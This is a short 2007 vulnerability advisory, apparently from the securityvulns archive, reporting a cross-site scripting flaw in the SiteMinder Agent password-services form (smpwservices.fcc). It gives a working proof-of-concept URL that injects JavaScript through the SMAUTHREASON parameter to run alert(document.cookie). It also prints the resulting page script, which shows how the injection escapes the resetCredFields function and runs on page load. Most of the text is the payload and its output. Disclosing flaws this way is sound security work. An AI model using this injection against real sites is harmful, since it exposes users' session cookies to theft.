SiteMinder Agent: Cross Site Scripting

2007-11-08T00:00:00
ID SECURITYVULNS:DOC:18369
Type securityvulns
Reporter Securityvulns
Modified 2007-11-08T00:00:00

Description

Exploit in [XSS]:

https://www.example.com/siteminderagent/forms/smpwservices.fcc?SMAUTHREASON=[XSS]

Cross Site Scripting (Code):

https://www.example.com/siteminderagent/forms/smpwservices.fcc?SMAUTHREASON=1)alert(document.cookie);}function+drop(){if(0

In this way we can inject the alert() code without brackets in the function resetCredFields().


function resetCredFields() {

if (1)
{
alert(document.cookie);
}

}

function drop(){

if( 0 == 0 || 1) { alert(document.cookie); } } function drop(){

if( 0 == 4 || 1) { alert(document.cookie); } }

function drop(){

if( 0 == 5 || 1) { alert(document.cookie); } }

function drop(){

if( 0 == 28 || 1) { alert(document.cookie); } }

function drop(){

if( 0 == 30 ) { document.PWChange.PASSWORD.value = ''; } else if (1) { alert(document.cookie); } }

function drop(){

if( 0 == 1 || 1) { alert(document.cookie); } }

function drop(){

if( 0 == 18 || 1) { alert(document.cookie); } }

function drop(){

if( 0 == 20 || 1) { alert(document.cookie); } }

function drop(){

if( 0 == 22 || 1) { alert(document.cookie); } }

function drop(){

if( 0 == 31 || 1) { alert(document.cookie); } } function drop(){

if( 0 == 34) { document.PWChange.NEWPASSWORD.value = ''; document.PWChange.CONFIRMATION.value = ''; } } ... <BODY bgcolor='#ffffff' text='#000000' onLoad = 'resetCredFields();'>


Regards, Giuseppe Gottardi (aka oveRet)


Giuseppe Gottardi Senior Security Engineer at Communication Valley S.p.A. E-mail: overet@securitydate.it Web: http://overet.securitydate.it

Wednesday November 07, 2007.